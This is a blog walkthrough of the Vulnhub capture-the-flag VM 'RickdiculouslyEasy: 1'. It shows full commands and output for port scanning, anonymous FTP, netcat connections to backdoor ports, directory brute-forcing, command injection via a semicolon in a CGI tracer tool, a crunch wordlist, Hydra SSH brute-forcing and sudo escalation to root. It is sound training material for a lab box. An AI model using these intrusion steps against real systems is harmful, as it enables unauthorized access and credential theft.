Thursday, October 5, 2017

RickdiculouslyEasy: 1 - Walkthrough

It has been a long time since I've last posted anything off of Vulnhub. To be honest, I just haven't had too much time to dive into any of these VM's. However, g0tmi1k released a ton of new VM's so I wanted to check them out. One of which is was RickdiculouslyEasy: 1 made by Luke.

This VM is based off the tv show Rick and Morty. I, myself, am a fan of this show so I had to check it out. It turned out to be quite easy but I still had fun solving it. Below is my walkthrough on capturing all of the flags. 




We start out running a discovery scan and find our VM:


 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                         
                                                                                                                                                       
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                       
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:00      1      60  Unknown vendor                                                                                      
 192.168.56.100  08:00:27:89:f9:13      1      60  PCS Systemtechnik GmbH                                                                              
 192.168.56.102  08:00:27:bf:52:95      1      60  PCS Systemtechnik GmbH 

We find our target: 192.168.56.102. We then run an NMAP scan and notice the open ports and services:


eric@linux:~$ nmap 192.168.56.102 -p21,22,80,9090,13337,22222,60000 -sV

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-05 08:08 CDT
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for localhost.localdomain (192.168.56.102)
Host is up (0.00044s latency).

PORT      STATE SERVICE    VERSION
21/tcp    open  ftp        vsftpd 3.0.3
22/tcp    open  tcpwrapped
80/tcp    open  http       Apache httpd 2.4.27 ((Fedora))
9090/tcp  open  http       Cockpit web service
13337/tcp open  tcpwrapped
22222/tcp open  ssh        OpenSSH 7.5 (protocol 2.0)
60000/tcp open  tcpwrapped
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.43 seconds
eric@linux:~$ 

We begin with the low hanging fruit and capture a few flags.

We notice with the ftp service that anonymous login is enabled. Upon logging in, we see the flag. We pull it down via GET and cat the contents:

eric@linux:~$ ftp 192.168.56.102
Connected to 192.168.56.102.
220 (vsFTPd 3.0.3)
Name (192.168.56.102:eric): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              42 Aug 22 05:10 FLAG.txt
drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
226 Directory send OK.
ftp> get FLAG.txt
local: FLAG.txt remote: FLAG.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for FLAG.txt (42 bytes).
226 Transfer complete.
42 bytes received in 0.00 secs (15.4484 kB/s)
ftp> quit
221 Goodbye.
eric@linux:~$ cat FLAG.txt 
FLAG{Whoa this is unexpected} - 10 Points
eric@linux:~$

Flag 1 is found. 10/130 points total:


FLAG{Whoa this is unexpected} - 10 Points

We then connect to port 60000 and notice it is "Ricks half baked reverse shell...". When connected, we are allowed to run minimal commands. However, running ls and cat allows us to see the flag and view the contents:


eric@linux:~$ nc -nv 192.168.56.102 60000
(UNKNOWN) [192.168.56.102] 60000 (?) open
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt 
# cat FLAG.txt
FLAG{Flip the pickle Morty!} - 10 Points 
# quit
quit: command not found 
# ^C
eric@linux:~$ 

Flag 2 is found. 20/130 points total:



FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points

Next we move to port 13337. When connected, we are quickly prompted with the next flag.


eric@linux:~$ nc -nv 192.168.56.102 13337
(UNKNOWN) [192.168.56.102] 13337 (?) open
FLAG:{TheyFoundMyBackDoorMorty}-10Points
eric@linux:~$ 

Flag 3 is found. 30/130 points total:


FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points

Next, we check out port 9090. Upon navigating to the page, we see our next flag:



Flag 4 is found. 40/130 points total.


FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG {There is no Zeus, in your face!} - 10 Points


We then move our way to port 80. We run DIRB against this and encounter a few directories that seem interesting:


eric@linux:~$ dirb http://192.168.56.102

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Oct  5 08:25:56 2017
URL_BASE: http://192.168.56.102/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.102/ ----
+ http://192.168.56.102/cgi-bin/ (CODE:403|SIZE:217)                                                                                                   
+ http://192.168.56.102/index.html (CODE:200|SIZE:326)                                                                                                 
==> DIRECTORY: http://192.168.56.102/passwords/                                                                                                        
+ http://192.168.56.102/robots.txt (CODE:200|SIZE:126)                                                                                                 
                                                                                                                                                       
---- Entering directory: http://192.168.56.102/passwords/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Thu Oct  5 08:25:58 2017
DOWNLOADED: 4612 - FOUND: 3
eric@linux:~$ 


Specifically, /cgi-bin/, /passwords/ and /robots.txt seem interesting. We begin with the /passwords/ directory. We notice a FLAG.txt inside.

Flag 5 is found. 50/130 total points.





FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG {There is no Zeus, in your face!} - 10 Points
FLAG{Yeah d- just don't do it.} - 10 Points


Next, if we go back to the /passwords/ directory and view the source of passwords.html, we notice a comment that says <!--Password: winter-->. We keep this in our pocket for later enumeration.



We then check out the /robots.txt directory and see 2 scripts within the /cgi-bin/ directory: root_shell.cgi and tracertool.cgi



Accessing /cgi-bin/tracertool.cgi, we see Morty's Machine Tracer Machine:


Upon enumeration, we notice that if we use a semi colon ";" we can then perform command execution. To prove, I run id, whoami, pwd and a few other simple commands:



And the response is as expected:



I was unsuccessful in gaining a shell with this RCE. I did notice that "cat" was not allowed. However, when running "more" against "/etc/passwd", I noticed that "Summer" was an active user:


Output below:


Remembering earlier about a password that was found "winter", I decided to try and SSH to port 22222 as Summer and the password "winter":


eric@linux:~$ ssh Summer@192.168.56.102 -p 22222
Summer@192.168.56.102's password: 
Last login: Wed Oct  4 15:31:17 2017
[Summer@localhost ~]$ whoami
Summer
[Summer@localhost ~]$ 

Success. Now that I have remote access, I did some enumeration. I found inside Summer's home directory another flag:


[Summer@localhost ~]$ pwd
/home/Summer
[Summer@localhost ~]$ more FLAG.txt 
FLAG{Get off the high road Summer!} - 10 Points
[Summer@localhost ~]$ 


Flag 6 found. 60/130 total points.


FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG {There is no Zeus, in your face!} - 10 Points
FLAG{Yeah d- just don't do it.} - 10 Points
FLAG{Get off the high road Summer!} - 10 Points

I did further enumeration and found 2 files located in Morty's home directory. I copied them over to Summer's directory and then SCP'd them to my local host:


[Summer@localhost ~]$ ls ../Morty/
journal.txt.zip  Safe_Password.jpg
[Summer@localhost ~]$ cp ../Morty/journal.txt.zip ~
[Summer@localhost ~]$ cp ../Morty/Safe_Password.jpg ~
[Summer@localhost ~]$ ^C
[Summer@localhost ~]$ exit
logout
Connection to 192.168.56.102 closed.
eric@linux:~$ scp -P 22222 Summer@192.168.56.102:journal.txt.zip ~
Summer@192.168.56.102's password: 
journal.txt.zip                                                                                                       100%  414   483.9KB/s   00:00    
eric@linux:~$ scp -P 22222 Summer@192.168.56.102:Safe_Password.jpg ~
Summer@192.168.56.102's password: 
Safe_Password.jpg                                                                                                     100%   42KB  17.5MB/s   00:00    
eric@linux:~$ ls
burp-hash.sqlite  Documents  FLAG.txt         Music     Public             Templates  vulnhub-rickdiculous
Desktop           Downloads  journal.txt.zip  Pictures  Safe_Password.jpg  Videos
eric@linux:~$

With both files saved locally, I noticed that the journal.txt.zip file was password protected. I tried viewing the jpg and it was just a picture of Rick. I then ran strings against the file and found the password:




I then tried the password "Meeseek" on the zip file and it successfully opened it. Looking at the contents was a message and another flag:


eric@linux:~$ unzip journal.txt.zip 
Archive:  journal.txt.zip
[journal.txt.zip] journal.txt password: 
  inflating: journal.txt             
eric@linux:~$ cat journal.txt
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?

Anyway. Here it is:

FLAG: {131333} - 20 Points 
eric@linux:~$ 

Flag 7 found. 80/130 total points only 50 to go!


FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG {There is no Zeus, in your face!} - 10 Points
FLAG{Yeah d- just don't do it.} - 10 Points
FLAG{Get off the high road Summer!} - 10 Points
FLAG: {131333} - 20 Points 


With the above information about Rick getting drunk and talking about a safe to a password, the FLAG contains "131333". I also noticed inside Rick's home directory appeared to be a directory to RICKS_SAFE. Inside this directory was an executable called "safe". So, I copied this "safe" to Summer's home directory and SCP'd it locally. I then ran the executable with the password "131333" and successfully opened the safe:



[Summer@localhost ~]$ ls ../RickSanchez/
RICKS_SAFE  ThisDoesntContainAnyFlags
[Summer@localhost ~]$ ls ../RickSanchez/RICKS_SAFE/
safe
[Summer@localhost ~]$ cp ../RickSanchez/RICKS_SAFE/safe ~
[Summer@localhost ~]$ exit
logout
Connection to 192.168.56.102 closed.
eric@linux:~$ scp -P 22222 Summer@192.168.56.102:safe ~
Summer@192.168.56.102's password: 
safe                                                                                                                  100% 8704     6.1MB/s   00:00    
eric@linux:~$ ./safe 131333
decrypt:  FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order


1 uppercase character
1 digit
One of the words in my old bands name.� @
eric@linux:~$ 

Flag 8 found. 100/130 total points:

FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG {There is no Zeus, in your face!} - 10 Points
FLAG{Yeah d- just don't do it.} - 10 Points
FLAG{Get off the high road Summer!} - 10 Points
FLAG: {131333} - 20 Points 
FLAG{And Awwwaaaaayyyy we Go!} - 20 Points




We then read the contents of Rick's safe and it suggests that incase he forgets his password, it is in the following syntax: 1 uppercase character, 1 digit and one of the words in his old bands name. He also mentions that "sudo is wheely good".



Knowing that Rick Sanchez's old bands name is "The Flesh Curtains" with Birdperson and Squanchy, I decide to use "crunch" to generate a password list with 1 upper case character, 1 digit and either ending in "Flesh" or "Curtains".



eric@linux:~$ crunch 10 10 -t ,%Curtains -o ./wordlist.curtains
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
eric@linux:~$ crunch 7 7 -t ,%Flesh -o ./wordlist.flesh
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
eric@linux:~$ cat wordlist.curtains > wordlist
eric@linux:~$ cat wordlist.flesh >> wordlist
eric@linux:~$ wc -l wordlist
520 wordlist
eric@linux:~$ 

With my password list generated, I then use Hydra to brute force my way as RickSanchez via SSH and found the correct password:


eric@linux:~$ hydra -l RickSanchez -P wordlist ssh://192.168.56.102 -s 22222
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-05 09:19:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 520 login tries (l:1/p:520), ~33 tries per task
[DATA] attacking ssh://192.168.56.102:22222/
[22222][ssh] host: 192.168.56.102   login: RickSanchez   password: P7Curtains
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-05 09:19:39
eric@linux:~$ 

With the correct password found: P7Curtains, I SSH successfully into the box as Rick. I then sudo to root per Rick's instructions and I extract the contents of the final flag:


eric@linux:~$ ssh RickSanchez@192.168.56.102 -p 22222
RickSanchez@192.168.56.102's password: 
Last failed login: Fri Oct  6 01:19:39 AEDT 2017 from 192.168.56.101 on ssh:notty
There were 176 failed login attempts since the last successful login.
Last login: Wed Oct  4 15:46:42 2017
[RickSanchez@localhost ~]$ sudo -i
[sudo] password for RickSanchez: 
[root@localhost ~]# more FLAG.txt 
FLAG: {Ionic Defibrillator} - 30 points
[root@localhost ~]# 

Flag 9 found. 130/130 total points:


FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG {There is no Zeus, in your face!} - 10 Points
FLAG{Yeah d- just don't do it.} - 10 Points
FLAG{Get off the high road Summer!} - 10 Points
FLAG: {131333} - 20 Points 
FLAG{And Awwwaaaaayyyy we Go!} - 20 Points
FLAG: {Ionic Defibrillator} - 30 points



This was a simple VM but I still had fun working on it. I enjoy the themes that were provided, especially Rick and Morty. I feel this VM provides a great introduction to pen testing and using a few common hacking tools to better enumerate and accomplish certain tasks.

Thanks to Luke for making a fun VM and vulnhub for hosting these great VM's.

Until next time!

geoda


No comments:

Post a Comment